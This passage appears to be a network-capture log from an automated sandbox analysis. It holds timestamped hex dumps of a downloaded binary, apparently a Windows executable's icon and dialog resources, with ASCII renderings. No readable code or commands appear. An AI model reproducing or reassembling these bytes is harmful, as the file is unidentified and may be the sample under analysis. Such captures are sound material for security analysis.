                                                                                                                                  2022-01-11 22:39:07 UTC1980INData Raw: 02 02 02 03 03 01 02 03 02 02 02 02 02 02 02 04 02 02 02 03 04 02 02 03 03 01 02 02 04 02 02 02 03 02 02 02 02 03 02 03 02 03 02 02 02 01 01 02 02 02 02 02 04 00 02 03 02 02 02 03 02 01 03 02 01 02 02 02 02 02 02 02 02 03 01 02 02 02 02 02 02 02 03 02 02 02 02 02 04 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 01 02 02 02 02 03 02 02 01 02 02 02 03 03 01 02 03 02 02 02 02 02 02 02 04 02 02 02 03 04 02 02 03 03 01 02 02 04 02 02 02 03 02 02 02 02 03 02 03 02 03 02 02 02 01 01 02 02 02 02 02 04 00 02 03 02 02 02 03 02 01 03 02 01 02 02 02 02 02 02 02 02 03 01 02 02 02 02 02 02 02 03 02 02 02 02 01 02 02 02 02 02 02 02 02 03 03 02 02 02 02 01 02 03 04 02 02 01 02 02 03 02 02 01 02 03 01 04 02 02 02 02 03 02 03 02 03 02 02 03 02 03 01 03 03 03 02 03 02 02
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:39:07 UTC1996INData Raw: 02 02 02 02 02 02 03 02 02 02 02 01 02 01 02 02 03 02 02 03 02 03 02 02 02 02 02 02 01 02 02 02 02 02 02 02 01 04 02 02 02 02 02 03 02 02 02 03 01 02 01 03 02 00 05 02 02 02 01 02 02 02 03 02 02 01 03 02 02 02 02 03 02 02 02 02 02 02 02 02 02 01 02 02 02 02 02 02 02 03 02 01 04 02 00 03 02 02 02 01 03 02 02 02 02 02 02 02 02 02 02 02 03 02 02 02 02 02 02 02 03 02 02 02 02 01 02 01 02 02 03 02 02 03 02 03 02 02 02 02 02 02 01 02 02 02 02 02 02 02 01 04 02 02 02 02 02 03 02 02 02 03 01 02 01 03 02 00 05 02 02 02 01 02 02 02 03 02 02 01 03 02 02 02 02 03 02 02 02 02 02 02 02 02 02 01 02 02 02 02 02 02 02 03 02 01 04 02 00 03 02 02 02 01 03 02 02 02 02 02 02 02 02 02 02 02 03 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 01 03 02 02 02 02 02 01 02 03 02 02
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:39:07 UTC2012INData Raw: 0e 1c 0a 31 33 26 2c 0a 1d 1d 1c 0a 2c 31 1d 1d 25 1d 25 1d 2f 0d 0a 33 25 25 09 2b 24 24 14 06 18 0a 1c 1d 09 2c 25 25 18 0a 31 0e 12 0a 26 25 25 25 2c 26 31 1c 1c 1c 25 25 09 1d 25 25 27 26 1d 2c 09 25 26 1c 1c 1d 25 2c 1c 2c 1c 1c 1c 2b 1c 2b 12 1d 25 2e 25 2e 25 25 25 25 1d 25 1d 25 2e 25 1d 1d 1d 2c 09 25 2c 12 1c 2c 2e 25 1d 2c 25 1d 25 25 1d 09 2c 1d 09 33 0d 14 29 24 1c 1d 1d 1d 1d 26 18 26 1c 1c 0d 0a 18 18 0a 1d 25 25 1d 25 25 09 1d 2c 2c 1c 1c 31 1c 26 26 26 09 2f 2c 09 1d 0a 1c 18 2c 15 1c 1c 0d 1d 09 2c 31 2c 0d 1c 1c 18 0a 0d 33 26 1c 0a 1c 0d 1c 1c 18 2c 1d 1c 0d 1c 25 25 25 09 2c 2c 2e 09 25 1c 24 14 07 12 2c 0d 0d 0e 1c 0e 2b 1c 0d 1d 2c 2c 09 2c 0d 31 26 1c 1c 1c 1c 36 1c 31 2c 1d 0d 31 1c 1c 31 2f 1c 0d 15 1c 2b 1c 26 0e 0d 1d 2c 31 1c
                                                                                                                                  Data Ascii: 13&,,1%%/3%%+$$,%%1&%%%,&1%%%%'&,%&%,,++%.%.%%%%%%.%,%,,.%,%%%,3)$&&%%%%,,1&&&/,,,1,3&,%%%,,.%$,+,,,1&61,11/+&,1
                                                                                                                                  2022-01-11 22:39:07 UTC2028INData Raw: 25 25 2e 25 2e 1d 25 2e 25 25 25 25 25 2e 25 1d 25 1d 25 1d 09 2c 2b 2c 27 25 1d 18 1d 26 09 31 2c 25 25 25 2e 25 2e 25 2e 25 25 25 2e 09 25 25 25 18 2c 1d 18 25 26 1d 25 25 1d 25 1d 32 1c 14 1c 32 25 1d 18 26 33 32 18 0a 18 1c 2c 1d 33 1d 1d 1c 14 0e 1c 1c 0e 1c 2c 1c 0e 23 1c 0e 24 0e 0e 0a 2c 31 26 1c 1c 1c 0a 1c 0d 1c 1c 1c 2c 2c 2c 0a 0d 31 0a 1d 09 1c 2c 2c 1d 1c 26 24 2b 0e 1c 09 25 2e 25 1d 2c 09 25 0a 1c 2c 2c 26 18 09 25 25 25 25 1d 2c 0d 1d 27 15 1c 1d 0d 25 0d 18 0d 1d 32 0a 2e 25 25 2e 2c 09 0d 1c 1c 2c 0d 25 24 13 24 1c 1c 18 0a 1c 2c 18 33 0d 26 2c 31 0a 2c 0d 2c 0a 25 25 1d 1d 1c 09 18 25 1d 25 1d 1c 2f 26 2c 26 26 26 26 0e 1c 0e 14 14 13 28 17 24 2c 1d 32 1d 18 2c 31 1d 2c 1d 25 25 1c 0e 2b 1c 33 26 26 31 31 26 2c 1c 14 0e 1d 26 0a 1c 1d
                                                                                                                                  Data Ascii: %%.%.%.%%%%%.%%%,+,'%&1,%%%.%.%.%%%.%%%,%&%%%22%&32,3,#$,1&,,,1,,&$+%.%,%,,&%%%%,'%2.%%.,,%$$,3&,1,,%%%%/&,&&&&($,2,1,%%+3&&11&,&
                                                                                                                                  2022-01-11 22:39:07 UTC2044INData Raw: 32 1c 1c 1c 31 1c 1c 0d 1c 2c 18 2c 0a 27 25 25 2e 1d 25 25 25 1d 1c 14 24 18 1d 25 18 25 1d 1c 2c 26 0a 1d 2c 1c 24 14 1c 25 2c 1d 26 25 1d 18 26 25 0d 1d 26 1c 1c 1c 0d 1c 0d 2f 26 2c 32 1d 1d 1c 26 2c 1d 09 0a 27 1d 1d 25 1d 25 25 09 2e 25 2e 25 09 2c 09 0d 1d 25 25 1d 25 25 25 25 0d 31 2c 1d 2c 1d 25 25 25 25 25 1d 25 25 1d 26 33 09 0a 2c 2c 25 1d 18 25 1d 25 1d 25 25 25 18 1d 09 26 26 26 0d 18 26 0a 33 26 2c 26 1d 1d 25 1d 1d 2c 27 0a 18 1c 0d 2c 26 1d 25 25 25 1d 25 1c 1d 0d 0a 09 1d 1d 25 2c 1d 25 1d 25 25 09 25 2e 1d 25 32 0a 1c 31 1c 0e 2c 2c 2c 0a 0e 14 1c 31 26 26 18 2c 2c 25 1d 0a 25 25 25 1d 25 1d 25 25 1d 25 09 25 25 0a 33 18 25 25 2e 25 1d 25 1d 25 26 0d 25 2e 1d 25 25 1d 1c 0a 2c 0a 25 26 0a 1d 1c 0a 18 1c 31 0e 24 31 1d 25 2c 0e 1c 1d 25
                                                                                                                                  Data Ascii: 21,,'%%.%%%$%%,&,$%,&%&%&/&,2&,'%%%.%.%,%%%%%%1,,%%%%%%%&3,,%%%%%%&&&&3&,&%,',&%%%%%,%%%%.%21,,,1&&,,%%%%%%%%%%3%%.%%%&%.%%,%&1$1%,%
                                                                                                                                  2022-01-11 22:39:07 UTC2060INData Raw: 1c 0e 2f 1c 0a 2c 18 0a 26 26 1d 1d 2c 32 2f 2c 25 25 2e 25 25 25 25 25 25 25 25 25 25 2e 1d 1d 09 32 25 09 26 1c 31 18 1c 31 26 1d 1c 1c 18 33 25 25 25 26 2c 18 26 26 1c 31 31 09 25 25 09 26 1c 31 25 25 09 0d 31 1c 0a 2c 0d 1c 2c 1d 32 15 25 1d 25 18 25 1d 25 25 25 1d 2c 24 21 1b 1b 14 0e 1c 0d 1c 0d 33 1d 1c 26 31 0d 2c 26 2c 1c 1c 1c 31 09 25 25 2c 31 24 1c 26 1d 1d 1c 1c 1c 2c 26 18 25 2c 25 25 2c 09 2f 25 09 25 1d 1d 25 1d 25 25 1d 1d 2c 31 2c 26 1c 14 09 26 09 18 1c 1c 26 09 33 09 33 18 1d 1d 2c 25 18 25 25 09 26 2b 07 0c 2b 1c 1c 1c 24 24 24 1c 1c 1c 1c 0e 31 1c 14 24 1c 0e 0d 33 1d 1d 25 09 2c 25 25 14 1c 1c 1d 1d 1d 0a 0e 1c 1c 31 26 1d 2c 2c 0a 27 0e 30 0e 0d 0a 1c 24 0e 23 0a 25 26 0d 0e 24 1c 24 31 0d 1c 0e 2b 1c 23 1c 2b 0d 1c 0a 0d 25 2c 1c
                                                                                                                                  Data Ascii: /,&&,2/,%%.%%%%%%%%%%.2%&11&3%%%&,&&11%%&1%%1,,2%%%%%%,$!3&1,&,1%%,1$&,&%,%%,/%%%%%,1,&&&33,%%%&++$$$1$3%,%%1&,,'0$#%&$$1+#+%,
                                                                                                                                  2022-01-11 22:39:07 UTC2076INData Raw: 08 03 03 01 03 0d 04 05 06 00 02 06 12 04 08 04 14 05 02 05 00 05 03 04 04 06 0b 0e 02 02 0e 0a 01 01 01 03 1a 08 19 10 10 00 2d 60 69 af 9a 69 ac 06 08 3d 15 10 11 0b 01 1f 07 05 0b 02 00 05 01 14 02 0b 00 04 04 0a 09 02 1a 0d 01 01 16 00 00 00 01 02 03 01 02 00 0f 08 17 06 02 01 01 0c 0c 01 02 13 09 09 09 01 0a 1d 02 00 02 27 09 03 0c 03 06 07 02 1d 00 00 0d 01 0b 02 01 14 01 6e 15 0a 03 01 0f 02 09 09 0e 02 01 11 00 05 01 00 00 0d 0e 03 2d 45 a5 32 07 02 1d 2a 05 03 0b 01 02 01 0c 00 02 01 05 04 00 05 08 00 00 05 12 00 05 01 01 00 05 00 01 02 03 01 07 0c 01 01 02 00 0f 01 0c 07 0a 1b 0e 11 12 04 0d ae 60 60 91 4f 30 04 0d 03 0d 11 06 0c 02 0b 04 01 01 00 05 05 03 18 08 05 06 1e 52 0c 14 05 0b 00 09 1c 18 1f 14 00 0b 00 0b 02 01 0c 02 18 08 02 09 07 01
                                                                                                                                  Data Ascii: -`ii='n-E2*``O0R
                                                                                                                                  2022-01-11 22:39:07 UTC2092INData Raw: 06 05 06 0f 01 06 06 08 00 00 06 00 0b 00 12 0d 0f 0d 01 02 08 3d 17 44 15 17 1e 15 23 03 01 03 00 06 1d 0e 03 02 03 01 05 00 04 0b 00 04 08 06 02 1d 0b 05 03 03 03 11 58 29 29 4c ad 67 bd 69 c2 1a 13 09 00 02 06 00 08 00 05 14 0c 03 0c 09 07 19 03 02 0e 01 07 01 0b 01 05 03 01 07 0b 09 22 13 03 07 22 22 13 07 07 00 07 12 96 26 21 08 01 08 16 06 00 01 05 03 00 08 00 03 00 06 02 1a 1c 01 09 01 07 0b 01 2a 04 08 15 06 20 8a a4 26 04 02 05 03 00 01 0e 0d 01 0e 16 00 20 20 12 16 08 00 0d 02 03 06 02 00 01 0f 03 0f 00 02 0b 01 02 0b 0a 1d 05 04 23 1e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 a4 38 03 00 b4 88 06 00 28 44 00 00 00 00 00 00 00 00 00 00 28 00 00 00 80 00 00 00 80 00 00 00 01 00 08 00 00 00 00 00 00 40 00 00 12 0b
                                                                                                                                  Data Ascii: =D#X))Lgi"""&!* & #(8(D(@
                                                                                                                                  2022-01-11 22:39:07 UTC2108INData Raw: ff f3 f2 f2 f2 f2 f4 ff ff ff f4 f2 f2 f3 f3 f3 f3 ff ff ff ff f4 f3 f2 f2 f2 f3 ff ff ff ff ff ff f4 f4 f4 ff ff ff ff bc bc f1 f2 f3 ff ff f4 f3 f3 f3 f3 f4 f4 ff ff f4 f3 f2 f2 f1 f2 f3 f4 f4 f4 f2 f2 f1 f1 f2 f4 ff ff f4 f3 f2 f3 f3 f3 f3 ff ff ff ff f4 f3 f2 f2 f2 f3 ff ff ff ff ff ff f4 f4 f4 ff ff ff ff bc bc f1 f2 f3 ff ff f4 f3 f3 f3 f3 f4 f4 ff ff f4 f3 f2 f2 f1 f2 f3 f4 f4 f4 f2 f2 f1 f1 f2 f4 ff ff f4 f3 f2 f3 f3 f2 f1 f3 f4 f4 f4 f4 f3 f2 f1 f1 f1 f2 ff ff ff ff ff ff f4 f4 f4 ff ff ff ff f1 f1 f2 f2 f4 f4 f4 f4 f3 f2 f2 f3 f3 f4 f4 f4 f3 f2 f1 f1 07 f1 f2 f3 f3 f3 f2 f1 f1 f2 f4 f4 f4 f4 f4 f3 f3 f3 f2 f1 f3 f4 f4 f4 f4 f3 f2 f1 f1 f1 f2 ff ff ff ff ff ff f4 f4 f4 ff ff ff ff f1 f1 f2 f2 f4 f4 f4 f4 f3 f2 f2 f3 f3 f4 f4 f4 f3 f2 f1 f1 07 f1
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:39:07 UTC2124INData Raw: 00 01 07 0e 02 0f 00 00 00 02 07 03 0d 00 00 0d 00 0b 3c 64 57 1e 01 13 09 02 00 0b 0d 0f 00 03 04 05 00 00 04 0f 34 00 0f 00 06 10 04 05 05 05 03 06 01 03 14 0c 0e 02 13 0e 0a 0a 01 14 0a 0c 22 13 0a 16 0a 0b 07 09 0b 63 09 09 09 13 0a 1f 01 05 01 14 0b 0d 0a 0b 05 00 09 01 05 02 0e 0d 03 07 06 00 06 06 0f 05 00 02 05 0d 00 06 05 01 01 02 07 01 11 05 03 00 05 01 09 0c 0b 01 02 06 0d 01 04 10 03 07 03 04 02 08 1e 5e 10 08 03 02 07 09 0d 20 10 00 04 10 8d 04 03 04 11 00 03 04 00 03 02 00 01 01 0a 02 07 01 01 07 1f 0c 02 00 0a 08 01 00 14 0c 05 0a 06 04 00 02 00 04 1a 05 16 04 11 10 30 15 10 21 30 17 04 03 08 06 02 0f 00 01 01 0c 00 01 13 09 14 09 09 1f 0c 02 14 13 14 13 01 06 00 07 09 1b 01 01 1c 0a 0a 13 07 01 0d 6b 3b 06 32 01 08 01 01 1f 0a 06 01 07 00
                                                                                                                                  Data Ascii: <dW4"c^ 0!0k;2
                                                                                                                                  2022-01-11 22:39:07 UTC2140INData Raw: 03 00 00 01 02 00 03 08 04 05 00 05 08 0f 07 06 19 07 03 18 82 21 03 00 01 07 0d 00 0e 02 06 0f 00 06 08 06 04 08 06 04 00 04 06 04 04 06 08 05 00 03 03 06 11 11 18 04 03 0f 04 06 00 08 12 08 0f 02 00 0d 04 08 04 16 06 24 00 03 05 08 00 00 00 01 0c 13 00 20 17 31 24 0d 04 01 0a 07 08 1a 0d 10 00 00 03 08 10 03 05 03 13 05 18 18 1e 65 18 2e 06 04 01 02 08 06 16 12 06 15 15 25 10 08 02 06 00 00 05 0d 07 09 06 00 02 04 02 04 00 02 07 06 32 0e 18 00 16 0f 06 08 01 0b 07 01 03 03 06 00 02 05 05 01 05 06 00 01 02 01 02 01 02 03 07 06 08 31 66 61 16 00 00 06 01 1c 07 01 02 02 00 06 00 03 06 04 04 04 11 0f 24 12 04 10 07 05 07 02 03 00 5b 15 08 05 1c 07 01 00 05 03 02 02 00 1a 04 04 05 05 01 03 00 12 04 11 04 04 02 00 02 03 01 02 01 08 75 16 02 01 07 07 00 0b 07
                                                                                                                                  Data Ascii: !$ 1$e.%21fa$[u
                                                                                                                                  2022-01-11 22:39:07 UTC2156INData Raw: 5b 04 05 05 01 05 05 04 03 05 00 05 04 08 7c 29 19 03 01 05 01 01 12 01 03 00 03 06 13 01 07 09 09 09 01 1c 0a 41 0c 03 0c 13 09 0a 09 09 07 01 05 0a 03 22 09 0a 09 01 00 06 01 03 01 03 09 08 28 06 0d 06 08 03 03 00 00 03 03 00 00 02 00 16 10 00 13 14 07 01 0a 0e 10 10 08 12 20 0f 01 01 06 00 01 00 0b 07 01 03 02 00 08 10 10 06 02 03 02 0f 00 03 03 08 02 06 00 08 0b 04 20 12 15 00 02 01 02 01 03 01 03 00 d4 83 aa 02 00 03 0e 16 03 0b 20 56 32 0c 09 0e 07 01 02 02 0a 0d 37 45 26 0f 0a 01 05 00 0d 06 00 06 00 06 00 11 4d 28 00 02 41 0d 00 06 08 1b 03 02 13 22 4a 4a 36 62 22 1b 09 22 07 09 02 0c 0a 0a 27 09 13 01 03 00 02 14 02 1d 05 2d 05 01 03 00 02 06 07 02 03 0d 11 00 03 04 16 01 04 0f 02 03 02 07 11 32 18 1e 17 00 01 02 00 00 0d 02 0d 04 0d 0d 02 07 07
                                                                                                                                  Data Ascii: [|)A"( V27E&M(A"JJ6b""'-2
                                                                                                                                  2022-01-11 22:39:07 UTC2172INData Raw: 21 1e 13 00 04 1e 13 21 20 1e 21 1e 1e 21 21 16 21 13 21 10 16 1e 21 1d 21 02 16 1e 0c 16 13 21 21 1e 0a 13 20 20 13 0a 1e 21 21 13 16 0c 1e 16 11 21 28 21 1e 16 13 21 13 21 16 21 21 1e 1e 21 1d 20 21 13 1e 1e 13 21 20 1e 21 1e 1e 21 21 16 21 13 21 10 16 1e 21 1d 21 02 16 1e 0c 16 13 21 21 1e 0a 13 20 20 13 0a 1e 21 21 13 16 0c 1e 16 11 21 28 21 1e 16 13 21 13 21 16 21 21 1e 1e 21 1d 20 21 13 1e 16 1e 13 21 21 21 20 21 16 21 1e 11 21 1e 20 1e 16 13 0c 16 1e 1e 21 1e 21 21 13 28 21 20 21 21 20 21 20 21 1d 13 21 21 1d 21 1e 1e 0c 16 13 16 1e 20 1e 21 11 1e 21 0c 21 20 21 21 21 13 1e 16 16 1e 13 21 21 21 20 21 16 21 1e 11 21 1e 20 1e 16 13 0c 16 1e 1e 21 1e 21 21 13 28 21 20 21 21 20 21 20 21 1d 13 21 21 1d 21 1e 1e 0c 16 13 16 1e 20 1e 21 11 1e 21 0c 21 20
                                                                                                                                  Data Ascii: !! !!!!!!!!! !!!(!!!!!! !! !!!!!!!!! !!!(!!!!!! !!!! !!! !!!(! !! ! !!!! !!! !!!!!! !!! !!!(! !! ! !!!! !!!
                                                                                                                                  2022-01-11 22:39:07 UTC2188INData Raw: 21 21 21 21 21 21 13 21 1e 20 13 1e 21 21 21 20 21 16 13 13 16 16 13 13 16 21 20 21 21 21 1e 13 20 1e 21 13 21 21 21 21 21 21 21 21 13 13 16 1e 21 21 21 21 21 21 21 21 21 21 1d 16 13 13 21 21 21 21 21 21 21 21 13 21 1e 20 13 1e 21 21 21 20 21 16 13 13 16 0f 13 13 07 10 21 0a 21 16 20 21 13 21 13 21 09 12 13 13 10 21 0c 1e 21 21 1d 03 01 21 21 21 21 21 21 21 21 00 04 1d 21 21 1e 0c 21 13 13 13 12 09 21 13 21 13 21 20 16 21 0a 21 10 07 13 13 10 0f 13 13 07 10 21 0a 21 16 20 21 13 21 13 21 09 12 13 13 10 21 0c 1e 21 21 1d 03 01 21 21 21 21 21 21 21 21 00 04 1d 21 21 1e 0c 21 13 13 13 12 09 21 13 21 13 21 20 16 21 0a 21 10 07 13 13 10 20 21 13 21 13 13 1e 21 21 21 13 21 0a 20 21 21 21 21 20 1e 21 21 20 1e 21 21 21 13 1e 11 21 21 21 21 13 1e 13 21 21 21 1e 20
                                                                                                                                  Data Ascii: !!!!!!! !!! !! !!! !!!!!!!!!!!!!!!!!!!!!!!!!!!! !!! !!! !!!!!!!!!!!!!!!!!!!! !!!! !!!!!!!!!!!!!!!!!!!! !! !!!!!! !!!! !! !!!!!!!!!!
                                                                                                                                  2022-01-11 22:39:07 UTC2204INData Raw: ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 b1 cf 78 21 27 cf 78 21 00 cf 78 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cf 78 21 00 cf 78 21 00 cf 78 21 2c cf 78 21 b7 cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 a9 cf 78 21 0f cf 78 21 00 00 00 00 00 00 00 00 00 d2 76 1f 00 ce 77 22 00 cf 78 22 30 cf 78 21 d4 cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 b0 cf 78 21 26 cf 78 21 00 cf 78 21 00 cf 78 21 00 00 00
                                                                                                                                  Data Ascii: x!x!x!x!x!x!x!x!x!x!x!x!x!'x!x!x!x!x!,x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!vw"x"0x!x!x!x!x!x!x!x!x!x!x!x!x!&x!x!x!
                                                                                                                                  2022-01-11 22:39:07 UTC2220INData Raw: ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff d0 79 21 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 7a 22 9b cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 f9 cf 78 22 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cf 78 21 50 cf 78 21 f9 cf 78 21 ff cf 78
                                                                                                                                  Data Ascii: x!x!x!x!x!x!x!x!y!|z"x!x!x!x!x!x!x!x!x!x!x"Ox!Px!x!x
                                                                                                                                  2022-01-11 22:39:07 UTC2236INData Raw: ff cf 78 21 fe cf 78 21 f9 cf 78 21 c3 cf 78 21 60 ce 78 22 20 ce 78 23 08 cf 78 22 00 cf 78 22 00 d0 79 21 00 d0 79 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cf 79 20 00 cf 79 20 00 ce 79 21 00 cf 79
                                                                                                                                  Data Ascii: x!x!x!x!`x" x#x"x"y!y!y y y!y
                                                                                                                                  2022-01-11 22:39:07 UTC2252INData Raw: 73 cf 78 21 30 cf 78 21 0e cf 78 21 00 cf 78 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cf 78 21 00 cf 78 21 00 cf 78 21 00 cf 78 21 00 d0 77 21 03 cf 78 21 10 ce 79 21 41 ce 79 21 94 ce 79 21 cf cf 78 21 ef cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 fd cf 78 21 ea cf 78 21 c5 cf 78 21 89 cf 78 21 39 cd 76 23 0c cb 74 24 02 ce 77 22 00 ce 77 22 00 cf 78 21 00 cf 78 21 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: sx!0x!x!x!x!x!x!x!w!x!y!Ay!y!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!9v#t$w"w"x!x!
                                                                                                                                  2022-01-11 22:39:07 UTC2268INData Raw: ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 e0 cf 78 21 9b cf 78 21 5c cf 78 21 28 cf 78 21 09 cf 78 21 01 cf 78 21 00 cf 78 21 00 cf 78 21 00 cf 77 21 00 cf 77 21 00 cf 77 21 00 cf 76 21 03 cf 76 21 10 cf 78 21 36 cf 78 21 74 cf 78 21 b2 cf 78 21 ea cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78 21 ff cf 78
                                                                                                                                  Data Ascii: x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!\x!(x!x!x!x!x!w!w!w!v!v!x!6x!tx!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x!x
                                                                                                                                  2022-01-11 22:39:07 UTC2284INData Raw: 02 cf 78 21 00 cf 78 21 00 cf 78 21 00 cf 78 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: x!x!x!x!
                                                                                                                                  2022-01-11 22:39:07 UTC2300INData Raw: b8 cd 5f e4 f6 6b 2e bd d5 5f 3f 9d ff fe 7f f5 8f c9 57 52 ee fc db f3 96 d6 bb 43 3a f8 16 16 43 24 a6 7d 42 ae 12 f2 06 65 7e 4c 07 1d a4 c8 1f 24 c7 ad 67 f3 ba 33 dc 17 7e bb 72 74 82 90 ac 09 b2 8e 88 e7 b3 0f 16 cc 7e df c1 53 62 d4 c9 e1 02 a0 87 39 fd a2 aa a2 aa b8 20 d8 51 88 16 07 e6 61 fe b5 1f e4 bb ff d3 1f d6 d8 e8 46 34 f4 51 59 17 e5 ae c0 5b a2 bc 8e f2 1a 70 15 db 01 3d 41 c9 cd af 83 68 82 3d 09 ee 97 f1 d0 ac ab fd 6f a0 7c 03 e5 75 4c 0b 58 42 b4 1d 26 f2 1c 20 99 c8 f9 bd cf fc 3b 88 28 1a 05 d5 80 ea f3 2b a6 92 0e 1f 49 43 34 b6 56 f3 b7 7e f3 03 5d 49 68 23 ea 8b a5 4b 99 22 ef 38 08 9e 80 32 3c 6d cf dc d7 b7 df 53 17 20 9d 6a 9f db dc 9c 7a a7 01 ea 24 01 fe 9f 3d 0e 96 5a ea 99 4e 55 01 30 60 3e a9 3a fe 2c 51 e4 f9 26 d1 43
                                                                                                                                  Data Ascii: _k._?WRC:C$}Be~L$g3~rt~Sb9 QaF4QY[p=Ah=o|uLXB& ;(+IC4V~]Ih#K"82<mS jz$=ZNU0`>:,Q&C
                                                                                                                                  2022-01-11 22:39:07 UTC2316INData Raw: 00 00 00 00 00 00 00 02 50 07 00 b8 00 24 00 08 00 ed 03 00 00 ff ff 82 00 46 00 6f 00 6e 00 74 00 20 00 63 00 6f 00 6c 00 6f 00 26 00 72 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 23 02 21 50 50 00 b5 00 4a 00 1e 00 86 18 00 00 ff ff 85 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 50 ac 00 9c 00 2e 00 0a 00 7e 18 00 00 ff ff 80 00 55 00 6e 00 26 00 64 00 65 00 72 00 6c 00 69 00 6e 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 50 ac 00 aa 00 1f 00 0a 00 7f 18 00 00 ff ff 80 00 49 00 26 00 74 00 61 00 6c 00 69 00 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 50 ac 00 b7 00 1d 00 0a 00 80 18 00 00 ff ff 80 00 42 